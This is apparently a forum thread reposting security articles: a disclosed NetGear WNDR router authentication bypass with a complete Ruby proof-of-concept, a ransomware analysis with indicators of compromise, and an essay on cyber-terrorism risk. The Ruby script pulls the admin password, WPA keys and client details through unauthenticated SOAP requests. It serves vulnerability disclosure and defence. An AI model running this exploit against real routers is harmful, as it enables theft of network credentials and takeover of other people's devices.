The Parliament also proposes other steps, such as investment in educational and social schemes that address the root causes of radicalisation, “disengagement and de-radicalisation” programmes and increased information sharing. “Member states should improve the exchange of information between law enforcement authorities and EU agencies. Only 50 per cent of information regarding terrorism and organised crime is currently given by member states to Europol and Eurojust,” highlights the Parliament statement. ® Sursa
  23. >> NetGear WNDR Authentication Bypass / Information Disclosure Reported by: ---- Peter Adkins <peter.adkins () kernelpicnic.net> Access: ---- Local network; unauthenticated access. Remote network; unauthenticated access*. Tracking and identifiers: ---- CVE - Mitre contacted; not yet allocated. Platforms / Firmware confirmed affected: ---- NetGear WNDR3700v4 - V1.0.0.4SH NetGear WNDR3700v4 - V1.0.1.52 NetGear WNR2200 - V1.0.1.88 NetGear WNR2500 - V1.0.0.24 Additional platforms believed to be affected: ---- NetGear WNDR3800 NetGear WNDRMAC NetGear WPN824N NetGear WNDR4700 Vendor involvement: ---- 2015-01-18 - Initial contact with NetGear regarding vulnerability. 2015-01-18 - NetGear advised to email support with concerns. 2015-01-18 - Email sent to NetGear (support). 2015-01-19 - Email sent to Mitre. 2015-01-20 - NetGear (support) advised that a ticket had been created. 2015-01-21 - NetGear (support) requested product verification. 2015-01-21 - Replied to NetGear with information requested. 2015-01-23 - NetGear (support) requested clarification of model. 2015-01-23 - Replied to NetGear with list of affected models. 2015-01-27 - NetGear (support) replied with router security features. 2015-01-27 - Replied to NetGear and reiterated vulnerability. 2015-01-29 - Email sent to NetGear (OpenSource) regarding issue. 2015-01-30 - Case auto-closure email received from NetGear (support). 2015-02-01 - Reply from Mitre requesting additional information. 2015-02-01 - Email to Mitre with additional information. 2015-02-11 - Vulnerability published to Bugtraq and GitHub. Mitigation: ---- * Ensure remote / WAN management is disabled on the affected devices. * Only allow trusted devices access to the local network. Notes: ---- * These vulnerabilities can be leveraged "externally" over the internet, but require devices to have remote / WAN management enabled. * Due to the location of this issue (net-cgi) this vulnerability may be present in other devices and firmware revisions not listed in this document. * In the absence of a known security contact these issues were reported to NetGear support. The initial response from NetGear support was that despite these issues "the network should still stay secure" due to a number of built-in security features. Attempts to clarify the nature of this vulnerability with support were unsuccessful. This ticket has since been auto-closed while waiting for a follow up. A subsequent email sent to the NetGear 'OpenSource' contact has also gone unanswered. * If you have a NetGear device that is believed to be affected and can confirm whether the PoC works successfully, please let me know and I will update the copy of this document on GitHub (see below) and provide credit for your findings. ---- "Genie" SOAP Service ---- A number of NetGear WNDR devices contain an embedded SOAP service that is seemingly for use with the NetGear Genie application. This service allows for viewing and setting of certain router parameters, such as: * WLAN credentials and SSIDs. * Connected clients. * Guest WLAN credentials and SSIDs. * Parental control settings. At first glance, this service appears to be filtered and authenticated; HTTP requests with a `SOAPAction` header set but without a session identifier will yield a HTTP 401 error. However, a HTTP request with a blank form and a `SOAPAction` header is sufficient to execute certain requests and query information from the device. As this SOAP service is implemented by the built-in HTTP / CGI daemon, unauthenticated queries will also be answered over the internet if remote management has been enabled on the device. As a result, affected devices can be interrogated and hijacked with as little as a well placed HTTP query. The attached proof of concept uses this service in order to extract the administrator password, device serial number, WLAN details, and various details regarding clients currently connected to the device. A copy of this document, as well as the proof of concept below and a more detailed write-up has been made available via GitHub: * https://github.com/darkarnium/secpub/tree/master/NetGear/SOAPWNDR ---- Ruby PoC ---- require 'optparse' require 'nokogiri' require 'restclient' # Set defaults and parse command line arguments options = {} options[:addr] = "192.168.1.1" options[:port] = 80 options[:ssl] = false OptionParser.new do |option| option.on("--address [ADDRESS]", "Destination hostname or IP") do |a| options[:addr] = a end option.on("--port [PORT]", "Destination TCP port") do |p| options[:port] = p end option.on("--[no-]ssl", "Destination uses SSL") do |s| options[:ssl] = s end option.parse! end # Define which SOAPActions we will be using. actions = [ { :name => "Fetch password", :call => "lan_config_security_get_info", :soap => "LANConfigSecurity:1#GetInfo" }, { :name => "Fetch WLAN", :call => "wlan_config_get_info", :soap => "WLANConfiguration:1#GetInfo" }, { :name => "Fetch WPA Security Keys", :call => "wlan_config_get_wpa_keys", :soap => "WLANConfiguration:1#GetWPASecurityKeys" }, { :name => "Fetch hardware", :call => "device_info_get_info", :soap => "DeviceInfo:1#GetInfo" }, { :name => "Fetch hardware", :call => "device_info_get_attached", :soap => "DeviceInfo:1#GetAttachDevice" } #{ # :name => "Dump configuration", # :call => "device_config_get_config_info", # :soap => "DeviceConfig:1#GetConfigInfo" #} ] def device_info_get_info(xml) puts "[*] Model Number: #{xml.xpath('//ModelName').text}" puts "[*] Serial Number: #{xml.xpath('//SerialNumber').text}" puts "[*] Firmware Version: #{xml.xpath('//Firmwareversion').text}" end def lan_config_security_get_info(xml) puts "[*] Admin Password: #{xml.xpath("//NewPassword").text}" end def wlan_config_get_info(xml) puts "[*] WLAN SSID: #{xml.xpath('//NewSSID').text}" puts "[*] WLAN Enc: #{xml.xpath('//NewBasicEncryptionModes').text}" end def wlan_config_get_wpa_keys(xml) puts "[*] WLAN WPA Key: #{xml.xpath('//NewWPAPassphrase').text} " end def device_config_get_config_info(xml) puts "[*] Base64 Config: #{xml.xpath('//NewConfigFile').text} " end def device_info_get_attached(xml) # Data is '@' delimited. devices = xml.xpath('//NewAttachDevice').text.split("@") devices.each_index do |i| # First element is a device count. if i == 0 next end # Split by ';' which pulls out the device IP, name and MAC. detail = devices[i].split(";") puts "[*] Attached: #{detail[2]} - #{detail[1]} (#{detail[3]})" end end # Form endpoint based on protocol, no path is required. if options[:ssl] endpoint = "https://#{options[:addr]}:#{options[:port]}/" else endpoint = "http://#{options[:addr]}:#{options[:port]}/" end # Iterate over all actions and attempt to execute. puts "[!] Attempting to extract information from #{endpoint}" actions.each do |action| # Build the target URL and setup the HTTP client object. request = RestClient::Resource.new( endpoint, :verify_ssl => OpenSSL::SSL::VERIFY_NONE) # Fire the request and ensure a 200 OKAY. begin response = request.post( { "" => "" }, { "SOAPAction" => "urn:NETGEAR-ROUTER:service:#{action[:soap]}"}) rescue puts "[!] Failed to query remote host." abort end if response.code != 200 puts "[-] '#{action[:name]}' failed with response: #{response.code}" next end # Parse XML document. xml = Nokogiri::XML(response.body()) if xml.xpath('//ResponseCode').text == '401' puts "[-] '#{action[:name]}' failed with a SOAP error (401)" next end # Send to the processor. send(action[:call], xml) end # FIN. Source
  24. The blog post of today is a bit different than usual, as you can read the full post on the Panda Security blog. Read it here: Yet another ransomware variant In this post I'm simply adding some additional information and repeating the most important points. So, there's yet another ransomware variant on the loose. You may call this one Chuingam (chewing gum?) ransomware or Xwin ransomware - pointing to respectively the file with this string 'Chuingam' dropped, or in the latter case the folder on C:\ it creates. Or just another (skiddie) Generic Ransomware. In the blog post above, I discuss the methodology to encrypt files it uses and how it creates your own personal key, as well as the ransom message and how to recover files (if you're lucky & fast enough). pgp.exe (PGP) is used to generate the public RSA key. Since pgp.exe requires the RAR password, this is temporarily stored in the file "filepas.tmp" - which is overwritten and deleted, so no chance to recover this file. As a note; it will (try to) encrypt any and all files with the following extensions: jpg, jpeg, doc, txt, pdf, tif, dbf, eps, psd, cdr, tst, MBD, xml, xls, dwg, mdf, mdb, zip, rar, cdx, docx, wps, rtf, 1CD, 4db, 4dd, adp, ADP, xld, wdb, str, pdm, itdb, pst, ptx, dxg, ppt, pptx If you've been infected with this ransomware, best thing to do is to either restore from a backup or try to restore previous files (also known as shadow copies). For additional information in regards to this specific ransomware, refer to: Yet another ransomware variant For any further background information on ransomware or further prevention & disinfection advice, I refer to my Q&A on ransomware. IOCs Hashes (SHA1) 88039ecb68749ea7d713e4cf9950ffb2947f7683 7e1dd704684f01530307f81bbdc15fe266ffd8db Domains/IPs corplawersp.com 5.63.154.90 Source
  25. Introduction The virtual space has over time become something of real importance for business, politics, work, communities and communications. In becoming gradually more and more dependent and addicted to the Internet, individuals, companies, organizations and governments have raised (or are raising) awareness of being intimately vulnerable to attacks and threats of various types. Not only can the Internet potentially be used “as it is” to conduct offensive actions that are born and die in cyber-space, but it can also be a great way to conduct complementary or parallel actions to physical threats, such as, for example, ideological/religious propaganda and information gathering of sensitive targets. Analyzing terrorist actions conducted in the past, we saw a massive use of electronic means, and, in consideration of the fact that through such means we can ideally act “without territorial boundaries“, it is certainly possible to say that the Internet ties the terrorists together. Besides the fact that, by the analysis of seized media in hot scenarios like Afghanistan, Syria and Iraq, were brought to light real intelligence campaigns conducted through its use in preparations of complex attacks. In addition, it is not difficult to imagine that even with not so high skills, the Internet can provide a good level of anonymity, control and coordination points, as well as a multitude of techniques for the exchange of sensitive information (steganography, encryption, encoding, words schemes, etc.). This article is intended to treat the generic elements of what is commonly called “cyber-terrorism” and the risks associated with the fact that today it really can occur. Definition and Concepts The term cyber-terrorism was first used by Barry Collin, a security researcher and an intelligence expert. He simply called “cyber-terrorism” as the convergence of the terms “cybernetic” and “terrorism“. Today, a definition popularly used to describe it is “the use of Internet and/or ICT networks against one or more critical national infrastructures (energy, transport, communications, military, economy, finance etc. etc.) in order to hit or intimidate a society and its peoples causing casualties or injuries for ideological, political or religious reasons“. From this definition, cyber-terrorism can be considered in some ways along the lines of physical acts of terrorism, with which it shares some essential features. One of the keywords used in discriminating actions of cyber-terrorism from other types of similar actions in cyberspace is the “motivation” that pushes the attackers. An action with a clear political/ideological motivation or with obvious notations related to religion are to be considered more likely acts of cyber-terrorism. The same type of action aimed at mere economic gain (through extortion or blackmail) would be more easily placed within the various layers of cybercrime (organized and not). Networked Agents (they are online) But how, commonly, are computing and multimedia resources currently used for pro-terrorism and/or pro-cyber-terrorism campaigns? Is it possible to identify key areas in which are concentrated their greatest online efforts now? One of these, among the most banal and obvious even though among the most disconcerting, is the “glorification of violence“. The glorification of violence and the push to emulate bloodthirsty acts is definitely one of the first goals for which the telematic medium is used today by terrorist groups. Beyond that, however, the Internet has become a great conduit for disseminating messages and resources targeted to the training of recruits and their indoctrination. In this regard, very particular attention must be given to social networks and sites devoted to meeting, such as chat rooms or forums. Another aspect certainly not to be underestimated is the so-called “online funding research“. Recently it was discovered that some online donations to apparent benevolent institutions went instead to fund organizations in the Middle East led by terrorist groups. There’s also a very wide use of the Internet for the dissemination of material devoted to “digital training“. Audio, video, online manuals and web content are increasingly devoted to the self-made training of new recruits. It is pretty clear then that the potential of the digital world is endless when viewed under this light. Besides the activities described above, also to be taken into account are the benefits coming from the capabilities of “active” information gathering actions, which are not limited to passively seek information, but which aim to get it through campaigns of affiliate hacker groups. Thanks to them, in close relation to their capacity of course, it is easy to assume that the quantity and especially the accuracy of the information collected is certain to increase, thereby increasing the “value” (may be better… the dangerousness) of any terrorist group. If we also think of the increased capacity of securely sharing this information, things seem even more threatening. If, in fact, the attack of 11/09 has seen a design largely based on an exchange of emails totally “in clear”, the terrorist groups have over time developed means and tools that are much more sophisticated to ensure the confidentiality of their communications. One of the best known is certainly the “Mujahideen Secrets”, widely used by Al-Qaeda until 2007 for the protection of online and mobile communications. Recently, however, other software have been developed over this, especially after the “leak” of Edward Snowden of June 2013, such as “Tashfeer al-Jawwal“, a platform for the use of encryption developed by the “Global Islamic Media Front (GIMF)” or l “Amn al-Mujahid“, a software for the use of strong encryption developed by the “Al-Fajr Technical Committee“, an organization traditionally linked to Al-Qaeda. The cyber-space, therefore, appears tied hand in glove with each stratum of the organization of terrorist groups, and the Internet is the backbone of this dimension that today is so strong that it is difficult even only to imagine the presence or evolution of such organizations without it. The Risk Today The theme of the real risk today about cyber-terrorism is certainly due to disagreements in opinions among the experts. Of course, it is very easy to imagine that a government technologically abreast and in possession of specific “cyber-attack” units has on its side both the skills and the motivation to develop very effective digital weapons to be used against sensitive targets. But what could we say about the capabilities of cyber-terrorists in a cyber-war against an international community? According to the definition above, can we attribute such advanced capabilities in the digital world to such groups? Despite the rather simple fact to assume (or better, to recruit) an experienced hacker, or perhaps a group of them and rely on the support of affiliated “software house” (see sections above), this does not mean to pursue a program of “digital weaponry” comparable to that of some governments. How can we identify the notations a real program of cyber-sabotage? The variables involved in this case are many, but as an evaluation term, we can consider by a practical point of view a hypothetical cyber-attack against a target among the most desirable to the eyes of a cyber-terrorist: an electrical power plant. So, what would I need to complete a similar cyber-attack with a good chance of success? One of the first things to consider, according to common experience, is the assured presence of redundant systems in such infrastructures. An effective pure cyber-terrorist attack therefore should provide adequate coordination and probably the use of very sophisticated malware. In this regard, therefore, would be needed very high technical skills, good movement in the “underground” to get information about the software in use, weaknesses in the infrastructure, exploit codes, as well as a good availability of money. All this without considering that if we are going to work at certain levels, a proper hardware will be needed to ensure adequate computing power, storage space and fast lines. Another factor not to be underestimated is certainly the human one. In fact, it seems unlikely that experienced and highly trained ICT security specialists will enlist in the ranks of these organizations. And even if this were to happen, such individuals would face many problems related to their small number. It takes indeed long time in the development of dedicated malware to reach a good level of reliability in performing the operations expected, as well as to put together all the information about the more critical targets and their vulnerabilities. All this now seems beyond the means of even the largest and economically advantaged terrorist organization. In addition, if we make a comparison with the physical world, the operations in cyberspace, as well as being much more complex to organize, are also less spectacular in the mind of the community. Even talking about internal growth and “in house” training, it’s certainly much easier to instruct at the use of weapons compared to even a “basic” training in cyber-security. Conclusion Although considered potentially devastating and almost certainly with an influence on a rather extensive geographical area, today the probabilities of a pure cyber-terrorist attack are quite low in my opinion. For sure, this specific threat is more likely to be associated with hostile governments that own the means and the interests to develop high offense capabilities in the digital world. This obviously does not means that the threat of cyber-attacks sourcing from terrorists is absent. Most probably indeed it is to be expected that they will use them as a complement of physical terrorist actions in the near future. Imagine, for example, the consequences of a denial of service attack against the emergency systems after an explosion in a subway. They would be catastrophic. In addition we have to consider that the use of modern information technology, the development of software that is very effective in ensuring the confidentiality of communications, as well as hacking techniques used for collecting informations about targets and persons are gradually increasing between terrorist groups, raising exponentially their skills of organization, coordination and consequently, their dangerousness. Source
×
×
  • Create New...